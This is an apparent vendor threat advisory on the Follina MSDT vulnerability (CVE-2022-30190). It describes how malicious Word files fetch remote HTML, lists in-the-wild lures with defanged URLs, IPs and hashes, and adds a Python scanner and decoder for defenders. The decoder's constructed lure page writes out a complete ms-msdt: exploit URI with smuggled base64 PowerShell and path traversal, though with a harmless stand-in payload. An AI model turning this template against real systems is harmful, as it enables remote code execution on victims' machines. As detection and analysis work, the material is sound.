A zero-day vulnerability, now tracked as CVE-2022-30190, was discovered in the Microsoft Windows Support Diagnostic Tool (MSDT).
On May 27, 2022, a researcher who goes by the Twitter handle nao_sec found an interesting Microsoft Word document that had been uploaded to VirusTotal from Belarus. The document fetches an external HTML file, which in turn uses the ms-msdt: URL protocol handler to execute PowerShell code.
How the Exploit Works
First, in a Microsoft Word file, an HTML file is referenced externally in word/_rels/document.xml.rels.
This file defines the relationships between document.xml and the other parts the document uses, including embedded objects. In this case the relationship being referred to is an OLE object. OLE objects are part of Microsoft's proprietary Object Linking and Embedding technology, which allows external documents, such as an Excel spreadsheet, to be embedded within a Word document. Normally an oleObject relationship points to an object stored inside the package; in the malicious documents it instead carries TargetMode="External" and a Target that is an http(s) URL, so Word retrieves the remote HTML when the document is opened, and that HTML hands an ms-msdt: URI to the protocol handler.
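The external oleObject relationship is the part of the document that a triage script can check statically. The following scanner is an added example, not Juniper's code or code from the samples: it opens a .docx as the ZIP package it is, reads word/_rels/document.xml.rels and reports every oleObject relationship whose TargetMode is External. The two packages it is run against are constructed here; the host name lure.example.invalid and the file name lure.html are placeholders, and the trailing "!" on the Target mirrors the URLs quoted for the in-the-wild samples below.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC package-relationship namespace and the relationship type Word uses for OLE objects.
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
STYLES_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                   "relationships/styles")


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return the oleObject relationships in word/_rels/document.xml.rels
    whose TargetMode is External.

    A legitimately embedded object lives inside the package and its Target is
    a package-internal path such as embeddings/oleObject1.bin. An oleObject
    relationship with TargetMode="External" and an http(s) Target makes Word
    fetch a remote file when the document is opened, which is the first stage
    of the attack described above. Only OOXML (ZIP) packages are handled;
    legacy binary .doc files are reported as having no hits.
    """
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
            if "word/_rels/document.xml.rels" not in pkg.namelist():
                return hits
            rels_xml = pkg.read("word/_rels/document.xml.rels")
    except zipfile.BadZipFile:
        return hits
    # ElementTree's expat parser does not fetch external entities, so parsing
    # relationship XML from an untrusted document is safe here.
    root = ET.fromstring(rels_xml)
    for rel in root.iter("{%s}Relationship" % PKG_NS):
        if (rel.get("Type") == OLE_REL_TYPE
                and rel.get("TargetMode", "Internal") == "External"):
            hits.append({"id": rel.get("Id"), "target": rel.get("Target")})
    return hits


def build_docx(rels_xml: str) -> bytes:
    """Build the smallest package the scanner needs (constructed test input,
    not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationship parts: one with an external OLE target, one with a
# normal embedded object.
LURE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1" Type="%s" Target="styles.xml"/>
  <Relationship Id="rId2" Type="%s" Target="http://lure.example.invalid/lure.html!" TargetMode="External"/>
</Relationships>
""" % (PKG_NS, STYLES_REL_TYPE, OLE_REL_TYPE)

BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1" Type="%s" Target="styles.xml"/>
  <Relationship Id="rId2" Type="%s" Target="embeddings/oleObject1.bin"/>
</Relationships>
""" % (PKG_NS, STYLES_REL_TYPE, OLE_REL_TYPE)

LURE_DOCX = build_docx(LURE_RELS)
BENIGN_DOCX = build_docx(BENIGN_RELS)

if __name__ == "__main__":
    for name, blob in (("lure.docx", LURE_DOCX), ("benign.docx", BENIGN_DOCX)):
        hits = external_ole_targets(blob)
        print("%s: %s %s" % (name, "SUSPICIOUS" if hits else "clean", hits))
```

Run against a real file with `external_ole_targets(open(path, "rb").read())`. An external oleObject target is rare in legitimate documents, so a hit is a strong triage signal, but it is not proof on its own: the HTML behind the URL still has to be retrieved and inspected.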
In-the-Wild Attacks
The following are documents we have observed in the wild exploiting this vulnerability. Due to the sensitivity of some of the documents, we have redacted parts of their contents.
This is the file first discovered by nao_sec that triggered the public disclosure of this exploit. It was first uploaded to VirusTotal on May 27, 2022, from an IP address geolocated in Belarus.
The doc file references the following HTML file:
This HTML contains the "ms-msdt:/" URI scheme followed by MSDT arguments and an embedded PowerShell command. The payload is base64-encoded; the decoded payload is another PowerShell script that kills the msdt.exe process and extracts 05-2022-0438.rar into rgb.exe.
We do not know the nature of rgb.exe, as we were unable to obtain a copy of either the RAR archive or rgb.exe.
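Decoding the payload out of a lure page like this is a mechanical step worth automating. The following is an added example, not code from the original post or from the samples: it pulls the ms-msdt: URI out of the JavaScript in the HTML, reads the MSDT switches, and base64-decodes the PowerShell carried in the /param argument, mirroring the UTF8.GetString(FromBase64String(...)) construct the lure itself uses. The HTML is constructed here; the URI follows the structure of the publicly analyzed sample (PCWDiagnostic package, IT_BrowseForFile parameter, directory traversal to mpsigstub.exe), while the payload is a harmless Write-Output stand-in rather than the attacker's script.

```python
import base64
import re

# Constructed stand-in for the attacker's second stage. The real decoded script
# killed msdt.exe and unpacked a RAR archive; this one only prints a line.
PAYLOAD_PS = "Write-Output 'constructed stand-in for the second-stage script'"
PAYLOAD_B64 = base64.b64encode(PAYLOAD_PS.encode("utf-8")).decode("ascii")

# Constructed lure page. /id selects the diagnostic package, /skip force
# suppresses prompts, and /param smuggles a PowerShell expression that
# base64-decodes and runs the payload. Real lures pad the page with several
# kilobytes of comments; that padding is omitted here.
LURE_HTML = r"""<!doctype html>
<html><body>
<script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'__B64__'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
</script>
</body></html>
""".replace("__B64__", PAYLOAD_B64)

# A JavaScript double-quoted string literal whose value starts with ms-msdt:.
_MSDT_STRING = re.compile(r'"(ms-msdt:(?:\\.|[^"\\])*)"', re.IGNORECASE)
# First run of at least 20 base64 characters after FromBase64String(.
_B64_RUN = re.compile(r"FromBase64String\(.*?([A-Za-z0-9+/=]{20,})", re.DOTALL)


def extract_msdt_uris(html: str) -> list:
    """Return every ms-msdt: URI found in a JS string literal, JS escapes removed."""
    return [m.replace('\\"', '"') for m in _MSDT_STRING.findall(html)]


def analyze_msdt_uri(uri: str) -> dict:
    """Split the URI into MSDT switches and decode the embedded payload."""
    def switch(name):
        m = re.search(r"/%s\s+(\S+)" % name, uri)
        return m.group(1) if m else None

    param_match = re.search(r'/param\s+"(.*)"', uri, re.DOTALL)
    param = param_match.group(1) if param_match else ""

    payload = None
    b64 = _B64_RUN.search(param)
    if b64:
        try:
            # The lure decodes with UTF8.GetString, so decode the same way.
            payload = base64.b64decode(b64.group(1)).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            payload = None

    return {
        "id": switch("id"),
        "skip": switch("skip"),
        # $( ) subexpressions or Invoke-Expression inside a diagnostic
        # parameter mean the handler will evaluate attacker-supplied PowerShell.
        "invokes_powershell": "Invoke-Expression" in param or "$(" in param,
        "path_traversal": "/../" in param,
        "payload": payload,
    }


if __name__ == "__main__":
    for uri in extract_msdt_uris(LURE_HTML):
        report = analyze_msdt_uri(uri)
        for key, value in report.items():
            print("%-19s %s" % (key + ":", value))
```

On a captured lure the "payload" field is where the kill-msdt and RAR-extraction commands described above would appear; the "id", "path_traversal" and "invokes_powershell" fields are the parts worth turning into detection content, since they do not depend on the payload's encoding.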
This file was first submitted to VirusTotal on April 8, 2022. It references the HTML file https://exchange[.]oufca[.]com.au/owa/auth/15.1.2375/themes/p3azx.html!, which leads to test.cab, which in turn downloads a base64-encoded Cobalt Strike BEACON from 220[.]127[.]116[.]11.
This file was uploaded to VirusTotal on May 5, 2022. It appears to be a memorandum sent to the Armed Forces of the Philippines regarding securing the national election, which was held on May 9, 2022.
It references an HTML file at http://141[.]98[.]215[.]99/color.html.
РЭТ-ЮМ-3044 от 12.04.2022.doc
This file was uploaded to VirusTotal on April 13, 2022. It references an HTML file at https://www[.]sputnikradio[.]net/radio/news/1134.html!. We were unable to obtain a copy of the HTML file.
VIP Invitation to Doha Expo 2023.rar
This file was first submitted to VirusTotal on June 1, 2022, presumably as an email attachment. Inside the RAR archive is a document, VIP Invitation to Doha Expo 2023.docx, with SHA-256 4fdec1c9111132a7f57fabfa83a6b7f73b3012d9100a790deaa53df184c1d4c4. It references an HTML file at https://files[.]attend-doha-expo[.]com/inv.html. The HTML retrieves a file from an SMB share on 18[.]104[.]22[.]168, maps the share to the Z: drive and executes a file from that share, osupdate.exe. The nature of osupdate.exe is unknown, as we were unable to retrieve the file.
Juniper Advanced Threat Prevention (ATP) detected this threat natively, without an update or signature, using behavioral analysis and machine learning.
Indicators of Compromise
| SHA-256 | File name |
| --- | --- |
| fe300467c2714f4962d814a34f8ee631a51e8255b9c07106d44c6a1f1eda7a45 | РЭТ-ЮМ-3044 от 12.04.2022.doc |
| d6be967d250f0be8e212cff9264fd0391a33f2ac00efeb508f7b79fca2fdf989 | VIP Invitation to Doha Expo 2023.rar |
| 4fdec1c9111132a7f57fabfa83a6b7f73b3012d9100a790deaa53df184c1d4c4 | VIP Invitation to Doha Expo 2023.docx |